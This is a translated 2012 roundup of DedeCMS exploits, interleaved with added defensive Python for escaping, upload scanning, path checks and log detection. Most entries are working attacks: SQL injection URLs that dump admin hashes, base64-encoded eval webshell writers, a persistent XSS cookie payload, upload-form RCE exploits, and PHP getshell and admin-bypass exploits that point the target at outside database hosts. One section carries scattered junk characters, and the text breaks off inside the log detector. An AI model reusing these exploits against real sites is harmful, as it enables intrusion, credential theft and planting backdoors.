DedeCMS vulnerability summary

Posted 2012-10-18 10:42:14
DedeCMS 5.6 rss.php injection vulnerability

http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

This is error-based extraction: updatexml() is handed an invalid XPath expression and MySQL echoes it back inside the error message as [uname:hash]. MID(pwd,4,16) cuts the 16-character MD5 out of the 20-character hash that DedeCMS stores (see the note under the advancedsearch.php entry below), and dede_admin is the admin table under the default dede_ prefix.
DedeCMS v5.6 embedded malicious code execution vulnerability
Register a member account and upload a "software" item. In the local address (本地地址) field enter:
a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes the code. The variant
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
writes x.php, a one-line eval shell whose POST parameter (password) is xiao (eC5waHA decodes to x.php, the second base64 string to the <?php eval($_POST[xiao])?> stub).
DedeCMS 5.6 GBK SQL injection vulnerability

http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

The three URLs are probes against the uid parameter (%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7 is the UTF-8 encoding of 涛声依旧); the post does not show the injected query or explain why the GBK build is affected.
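The post leaves the mechanism unexplained, so here is the general reason GBK-charset PHP sites of this era fall to injections that UTF-8 sites resist: addslashes() escapes byte by byte, but MySQL's gbk charset reads any byte 0x81-0xFE followed by 0x40-0xFE as one two-byte character, so a lead byte placed before the quote swallows the backslash that was inserted to protect it. The same trick is what the %cf' in the infosearch.php payload at the end of this page relies on. The code below is an added illustration written for this summary, not code from the post or from DedeCMS; the byte strings are constructed, addslashes() is re-implemented rather than called, and the tokenizer models MySQL's gbk lead/trail rule instead of using Python's codec tables.

```python
from typing import List, Optional


def addslashes(data: bytes) -> bytes:
    """Byte-wise equivalent of PHP addslashes(): a backslash before ' " \\ and NUL."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def gbk_tokens(data: bytes) -> List[bytes]:
    """Split bytes the way MySQL's gbk charset does: a lead byte 0x81-0xFE followed by a
    trail byte 0x40-0xFE (0x7F excluded) is one character; anything else is a single byte."""
    tokens, i = [], 0
    while i < len(data):
        lead = data[i]
        if 0x81 <= lead <= 0xFE and i + 1 < len(data):
            trail = data[i + 1]
            if 0x40 <= trail <= 0xFE and trail != 0x7F:
                tokens.append(data[i:i + 2])
                i += 2
                continue
        tokens.append(data[i:i + 1])
        i += 1
    return tokens


def quote_survives(payload: bytes) -> bool:
    """True if, after addslashes() and GBK tokenization, a single quote is still a free quote:
    the escaping backslash (0x5C) was absorbed as the trail byte of a multibyte character."""
    toks = gbk_tokens(addslashes(payload))
    for prev, cur in zip([b""] + toks, toks):
        if cur == b"'" and prev != b"\\":
            return True
    return False


def charset_aware_escape(payload: bytes) -> Optional[bytes]:
    """Safe form: tokenize by the connection charset first, refuse malformed sequences, then
    escape at character level so a backslash can never land inside a multibyte character.
    This is what mysql_real_escape_string does once the connection charset is set to gbk."""
    out = bytearray()
    for tok in gbk_tokens(payload):
        if len(tok) == 1 and tok[0] >= 0x81:
            return None  # lone lead byte: malformed GBK, reject instead of guessing
        if tok in (b"'", b'"', b"\\", b"\x00"):
            out.append(0x5C)
        out += tok
    return bytes(out)


if __name__ == "__main__":
    classic = b"\xbf'"  # constructed: 0xBF lead byte, then the quote
    print("addslashes ->", addslashes(classic), "tokens ->", gbk_tokens(addslashes(classic)))
    print("quote survives:", quote_survives(classic))
    print("charset-aware escape:", charset_aware_escape(classic))
```

addslashes() turns `\xbf'` into `\xbf\x5c'`; MySQL then reads `\xbf\x5c` as one character (縗) and the quote is live again. The charset-aware version refuses the lone lead byte outright, and escapes a well-formed GBK string at character boundaries.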

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

The sql parameter is executed as supplied. `#@__` is DedeCMS's table-prefix placeholder, so `#@__admin` resolves to dede_admin on a default install.
DedeCMS (all versions) gotopage parameter XSS vulnerability
1. Copy and open the URL below. It triggers the XSS and installs the "XSS rootkit". IE8/9 block reflected XSS carried in the URL, so turn off the XSS filter first.

http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser. Whichever of the URLs below you open afterwards, the XSS fires again.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php
DedeCMS (织梦) variable coverage getshell
#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if ($argv[2] == null) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
  aid=1 shellpath=/data/cache   aid=2 shellpath=/   aid=3 shellpath=/plus/
Example:
  php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url  = $argv[1];
$aid  = $argv[2];
$path = $argv[3];
$exp  = Getshell($url, $aid, $path);
// "OK" sits at offset 13 of "HTTP/1.1 200 OK", so this passes when the target answers 200
if (strpos($exp, "OK") > 12) {
    echo "Exploit Success \n";
    if ($aid == 1) echo "Shell:".$url."/$path/data/cache/fuck.php\n";
    if ($aid == 2) echo "Shell:".$url."/$path/fuck.php\n";
    if ($aid == 3) echo "Shell:".$url."/$path/plus/fuck.php\n";
} else {
    echo "Exploit Failed \n";
}

function Getshell($url, $aid, $path)
{
    $id   = $aid;
    $host = $url;
    $port = "80";
    // The _COOKIE[GLOBALS][cfg_db*] fields overwrite the database settings (variable coverage),
    // so mytag_js.php fetches its dede_mytag row from the MySQL server named here. Host, user,
    // password and database are the original author's; the server must hold the crafted row.
    $content  = "doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    $data  = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: close\r\n";   // close rather than keep-alive so the read loop below ends
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock = fsockopen($host, $port);
    if (!$ock) {
        echo "No response from ".$host."\n";
        return "";
    }
    fwrite($ock, $data);
    $exp = "";
    while (!feof($ock)) {
        $exp .= fgets($ock, 1024);
    }
    fclose($ock);
    return $exp;
}
?>
DedeCMS v5.6-5.7 unauthorized access vulnerability (straight into the admin backend)

http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

(织梦网站后台 stands for the admin directory.) Change validate=dcug to the captcha currently displayed and you are logged into the backend.

The precondition is that you know the backend path.

The _POST[GLOBALS][cfg_db*] parameters overwrite the database settings before the login query runs, so admin/inimda is checked against the MySQL server named in the URL, not the site's own database. The host, account and credentials in the URL are the original author's; the PoC only works against a database that holds a matching dede_admin row.
/ a* O: o5 Q5 y! X% c: m7 cDedecms织梦 标签远程文件写入漏洞
3 Y; {- C. j6 V3 ?+ E# B  p) x- M前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');1 `- Z+ b' a- R) a

; k' ?3 K' |$ _
# C0 Z, z8 M: }6 o5 ^再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 # T, [# f; g9 r: l7 V, F
<form action="" method="post" name="QuickSearch" id="QuickSearch">
6 k# }9 e( B# j/ w0 v3 z<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
7 g8 ^4 u; f# [$ v% D- \* c<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
  T) \; m8 N, @( r) N# g/ b8 O<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />7 C6 j, F) _5 c
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />; k1 B, K0 R; g) S
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
  o& r+ t5 L( ?3 G; N<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
/ V2 N" d/ g# j$ h0 m5 P/ T<input type="text" value="true" name="nocache" style="width:400">. ]5 Q/ o# J; m
<input type="submit" value="提交" name="QuickSearchBtn"><br />6 h+ G* d& R" y& X% z7 U* D' J
</form>; M8 k: l+ B: p7 w- @
<script># P5 ?. Y5 U6 \. e8 k
function addaction()( ~% I1 \% ?, K, X  `9 r
{
- U" x) E8 ^; {0 B5 g! Kdocument.QuickSearch.action=document.QuickSearch.doaction.value;
! G5 i- q/ n" u, ?/ \6 H}! ]* `4 Y* z+ Y) l
</script>6 [8 ^3 y' [* @6 \+ d5 O7 w
  G" Q0 `" `; i' e1 |- t+ k1 z2 Y
, k1 x1 l- w7 J$ [
% Q4 a3 i1 V" D

  [  n- p6 p# Y# `& Y0 W; M  ~& H; O0 \: X# i% J6 r0 c
9 J8 Z8 {' B; \% P  W! q
5 m3 F3 f; |0 C! v% Q5 k. t

  R8 h+ U9 b# }" S* [' I: f: g5 |) \3 W& D% \

DedeCMS <= V5.6 Final template execution vulnerability
1. Register a user, enter the member area, post an article and upload an image. Then, in attachment management, replace the image with a crafted template. Say the image name is:
uploads/userup/2/12OMX04-15A.jpg

Template content (prefix it with GIF89a if the image format is checked):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article you just posted, view the page source, and build a form like this:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>Edit article</strong></h3>
<div class="postForm">
<label>Title:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>Tags:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(comma separated)
<label>Author:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>Category:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test category</option>
</select> <span style="color:#F00">*</span>(coloured categories cannot be selected)
<label>My category:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>Select a category...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>Summary:</label>
<textarea name="description" id="description">1111111</textarea>
(brief description of the content)
<label>Thumbnail:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(crafted here)
</div>
<!-- form action area -->
<h3 class="meTitle">Body</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href=&quot;http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg&quot; target=&quot;_blank&quot;><img border=&quot;0&quot; alt=&quot;&quot; src=&quot;http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg&quot; width=&quot;1010&quot; height=&quot;456&quot; /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>Captcha:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="Can't read it? Click to refresh" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">Submit</button>
<button class="button2 ml10" type="reset">Reset</button>
</div>
</div>
</form>

Submit. If the site reports that the edit succeeded, the template path has been changed.
3. Open the edited article. Assuming its aid is 2, request:

http://127.0.0.1/dede/plus/view.php?aid=2

and the webshell 1.php is written into the plus directory.
DedeCMS site management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save this as 1.gif.
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit">Change</button>
</form>

Build the form above; after upload the image is stored as /uploads/userup/3/1.gif.
Post an article, then build the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>Select a category...</option>
<option value='1' class='option3' selected>aa</option>
</select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">Submit</button>
</form>
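The three template-execution entries above (the {dede:php} row in dede_mytag, the runphp='yes' template swapped in for an image, the GIF-prefixed 1.gif, and the toby57 attribute breakout) all leave the same kind of residue on disk: DedeCMS tag syntax inside files that should be images. The scanner below is an added example written for this summary, not DedeCMS code; it carries the four payloads quoted in this post as constructed samples plus one benign template, and the labels and pattern names are mine. Run scan_tree() over an uploads directory to find planted templates.

```python
import os
import re
from typing import Dict, List

# Template directives DedeCMS compiles into PHP, and the breakout shape used by the toby57 payload.
PHP_TAG_RE = re.compile(r"\{dede:php\b", re.I)
RUNPHP_RE = re.compile(r"\{dede:\w+[^}]*\brunphp\s*=\s*['\"]?yes", re.I)
# name\="']=0;code;//  closes the quoted attribute value in the generated PHP and appends code
ATTR_BREAKOUT_RE = re.compile(r"\{dede:\w+\s+[^}]*['\"]\]\s*=", re.I)
INLINE_PHP_RE = re.compile(r"<\?(?:php\b|=)", re.I)


def scan_bytes(data: bytes) -> List[str]:
    """Return the list of suspicious template constructs found in a file's content."""
    text = data.decode("latin-1")  # byte-transparent; everything we match is ASCII
    hits = []
    if PHP_TAG_RE.search(text):
        hits.append("dede:php block")
    if RUNPHP_RE.search(text):
        hits.append("runphp=yes tag")
    if ATTR_BREAKOUT_RE.search(text):
        hits.append("attribute breakout into generated PHP")
    if INLINE_PHP_RE.search(text):
        hits.append("raw PHP open tag")
    # a GIF header in front of template code is the "add gif89a" trick from the post
    if hits and data[:6].upper() in (b"GIF89A", b"GIF87A"):
        hits.append("image header masking template code")
    return hits


def scan_tree(root: str, max_bytes: int = 1 << 20) -> Dict[str, List[str]]:
    """Walk a directory (e.g. uploads/userup) and report every file carrying template directives."""
    report = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                hits = scan_bytes(fh.read(max_bytes))
            if hits:
                report[path] = hits
    return report


# Constructed samples: the payloads quoted in this post, plus a harmless template.
SAMPLES = {
    "mytag_php": b'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}',
    "runphp_template": (
        b"{dede:name runphp='yes'}\n$fp = @fopen(\"1.php\", 'a');\n"
        b"@fwrite($fp, '<'.'?php'.\"\\r\\n\\r\\n\".'eval($_POST[cmd])'.\"\\r\\n\\r\\n?\".\">\\r\\n\");\n"
        b"@fclose($fp);\n{/dede:name}"
    ),
    "gif_masked": b"Gif89a{dede:field name='toby57' runphp='yes'}\nphpinfo();\n{/dede:field}",
    "toby57_breakout": b"a{/dede:link}{dede:toby57 name\\=\"']=0;phpinfo();//\"}x{/dede:toby57}",
    "benign": b"{dede:field name='title'/}\n{dede:arclist row='10'}[field:title/]{/dede:arclist}",
}

if __name__ == "__main__":
    for label, content in SAMPLES.items():
        print(f"{label:16s} -> {scan_bytes(content) or 'clean'}")
```

Note that the runphp template writes its shell as '<'.'?php', so a scanner that only looks for a literal <?php open tag misses it; the tag syntax itself is the reliable indicator, since no legitimate upload should contain {dede:...} directives.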
DedeCMS V5.6 remote file deletion vulnerability

http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

The ../ segments in oldface are not normalised away, so the path walks out of the member's upload directory; here it deletes m_logo.gif from the member templates.
DedeCMS V5.6 plus/carbuyaction.php local file inclusion vulnerability

http://www.test.com/plus/carbuya ... urn&code=../../

(URL truncated in the original post; only the traversal in the code parameter survives.)
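Both the edit_face.php deletion and the carbuyaction.php inclusion above are the same defect: a user-supplied path is concatenated onto a directory and used before the ../ segments are resolved. The check below is an added example for this summary, not DedeCMS code. It contrasts the prefix test that the oldface payload walks past with a normalise-then-contain check; the web root, the member id and the include/payment directory for the code parameter are assumptions, while OLDFACE is the path from the post.

```python
import posixpath
from typing import Optional

WEBROOT = "/var/www/dede"  # assumed install path
OLDFACE = "/uploads/userup/8/../../../member/templets/images/m_logo.gif"  # from the post


def naive_prefix_check(allowed_prefix: str, user_path: str) -> bool:
    """The kind of check ../ defeats: accept the path if it merely starts with the right directory."""
    return user_path.startswith(allowed_prefix)


def where_delete_lands(oldface: str = OLDFACE, webroot: str = WEBROOT) -> str:
    """What plain concatenation followed by unlink() actually removes."""
    return posixpath.normpath(webroot + oldface)


def is_within(allowed_dir: str, candidate: str) -> bool:
    """Normalise both sides and require the candidate to be the directory or below it."""
    allowed = posixpath.normpath(allowed_dir)
    target = posixpath.normpath(candidate)
    return target == allowed or target.startswith(allowed + "/")


def safe_face_path(webroot: str, member_id: int, oldface: str) -> Optional[str]:
    """edit_face.php shape: the old avatar must stay inside the member's own upload directory."""
    allowed = posixpath.join(webroot, "uploads/userup", str(member_id))
    candidate = posixpath.join(webroot, oldface.lstrip("/"))
    return posixpath.normpath(candidate) if is_within(allowed, candidate) else None


def safe_payment_module(webroot: str, code: str) -> Optional[str]:
    """carbuyaction.php shape (assumed: code selects include/payment/<code>.php)."""
    allowed = posixpath.join(webroot, "include/payment")
    candidate = posixpath.join(allowed, code + ".php")
    return posixpath.normpath(candidate) if is_within(allowed, candidate) else None


if __name__ == "__main__":
    print("prefix check accepts payload:", naive_prefix_check("/uploads/userup/8/", OLDFACE))
    print("unlink would hit:", where_delete_lands())
    print("contained check returns:", safe_face_path(WEBROOT, 8, OLDFACE))
    print("code=../../ resolves to:", safe_payment_module(WEBROOT, "../../"))
```

posixpath is used deliberately so the result is the same on any host; on a real server use os.path.realpath on both sides so symlinks inside the upload directory cannot point back out.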
Note on the dede_admin dump returned by the advancedsearch.php entry above: the pwd column is the 32-character MD5 with the first 5 and last 7 characters removed, leaving 20 characters. Strip 3 more from the front and 1 from the back to get the standard 16-character MD5.
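The 20-character format matters for both the advancedsearch.php dump and the rss.php payload earlier on this page, whose MID(pwd,4,16) is exactly the "front minus 3, back minus 1" slice: it keeps the token inside the 32-character limit of MySQL's XPath error message and yields the conventional 16-character MD5 that lookup tables index. The code below is an added example for this summary, not DedeCMS code; it derives the stored value from a password, recovers the 16-character MD5 from it, and parses the [uname:hash] token out of a constructed error page.

```python
import hashlib
import re
from typing import List, Tuple


def dede_stored_hash(password: str) -> str:
    """What DedeCMS writes to dede_admin.pwd: the MD5 hex digest minus its first 5 and last 7 chars."""
    digest = hashlib.md5(password.encode("utf-8")).hexdigest()
    return digest[5:-7]


def md5_16_from_stored(stored: str) -> str:
    """Front minus 3, back minus 1: the same slice MID(pwd,4,16) takes in the rss.php payload."""
    return stored[3:-1]


def md5_16(password: str) -> str:
    """The conventional 16-character MD5, characters 9-24 of the 32-character digest."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()[8:24]


# [uname:hash16] as built by CONCAT(0x5b, uname, 0x3a, MID(pwd,4,16), 0x5d)
LEAK_RE = re.compile(r"\[([^\[\]:]+):([0-9a-fA-F]{16})\]")


def parse_updatexml_leak(response_body: str) -> List[Tuple[str, str]]:
    """Pull every (uname, hash16) pair that the updatexml() XPath error echoed back."""
    return LEAK_RE.findall(response_body)


# Constructed sample error body; DedeCMS's own wrapper text may differ, only the token matters.
SAMPLE_ERROR_BODY = "DedeCMS Error: XPATH syntax error: '[admin:7a57a5a743894a0e]'"

if __name__ == "__main__":
    stored = dede_stored_hash("admin")
    print("stored:", stored, "-> md5_16:", md5_16_from_stored(stored))
    print("leaked:", parse_updatexml_leak(SAMPLE_ERROR_BODY))
```

A username longer than 14 characters overflows the 32-character error window and the closing bracket is lost; when that happens, trim the leak to the fixed 16-character hash after the colon instead of relying on the bracket.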

DedeCMS 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

The payload is nested: the outer union makes the first query return a string, and that string is used as the second query, whose inner union maps userid and pwd from dede_admin onto the feedback columns that the page renders.
DedeCMS select_soft_post.php uninitialised variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action="http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php" method="POST" enctype="multipart/form-data" name="myform">
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

With register_globals on, the cfg_* fields posted here become the configuration variables the script never initialises: the allowed extension lists become php, cfg_basedir moves the base directory, and the upload is written as /data/cache/fly.php.
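Most of the PoCs on this page (the variable-coverage getshell script, the backdoor login, the mytag_js.php form and the select_soft_post.php form above, as well as the rss.php, advancedsearch.php, gotopage and edit_face.php URLs) leave a recognisable shape in the web server's access log. The detector below is an added example for this summary, not code from the post: it parses Apache combined-format lines, percent-decodes the request target and applies a handful of rules named after the page's entries. The log lines are constructed from the page's own URLs; the rule names are mine. One caveat the sample makes visible: POST bodies are not in access logs, so a body-borne _COOKIE[GLOBALS] or cfg_* override (lines 6 and 8) is only seen as an unusual POST to a script that is normally fetched with GET, and needs a WAF or request-body log to be confirmed.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')

# Rule name -> pattern applied to the percent-decoded request target.
RULES = [
    ("globals-config-override", re.compile(r"\[GLOBALS\]\[cfg_", re.I)),
    ("cfg-variable-override",
     re.compile(r"[?&]cfg_(?:basedir|imgtype|softtype|mediatype|not_allowall|db\w+)=", re.I)),
    ("advancedsearch-raw-sql", re.compile(r"/plus/advancedsearch\.php\?(?:[^ ]*&)?sql=", re.I)),
    ("updatexml-error-injection", re.compile(r"updatexml\s*\(", re.I)),
    ("gotopage-markup", re.compile(r'''gotopage=[^&]*[<>"']''', re.I)),
    ("dotdot-traversal", re.compile(r"(?:oldface|code)=[^&]*\.\./", re.I)),
]


def classify(method: str, target: str) -> List[str]:
    """Rule names that fire for one request line (method plus raw target)."""
    decoded = unquote(target)
    hits = [name for name, rx in RULES if rx.search(decoded)]
    # mytag_js.php is loaded by browsers with GET via <script src>; a POST to it is the getshell shape
    if method == "POST" and "/plus/mytag_js.php" in decoded:
        hits.append("mytag_js-post-review")
    return hits


def scan_access_log(lines: List[str]) -> List[Tuple[List[str], str]]:
    """Return (rule names, request target) for every line that triggers at least one rule."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hits = classify(m["method"], m["target"])
        if hits:
            findings.append((hits, m["target"]))
    return findings


# Constructed access-log lines built from the URLs on this page (Apache combined format).
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/list.php?tid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [18/Oct/2012:10:42:20 +0800] "GET /plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20updatexml%281,1,1%29%23%27][0]=1 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [18/Oct/2012:10:42:31 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 944 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [18/Oct/2012:10:42:40 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cx=%22 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
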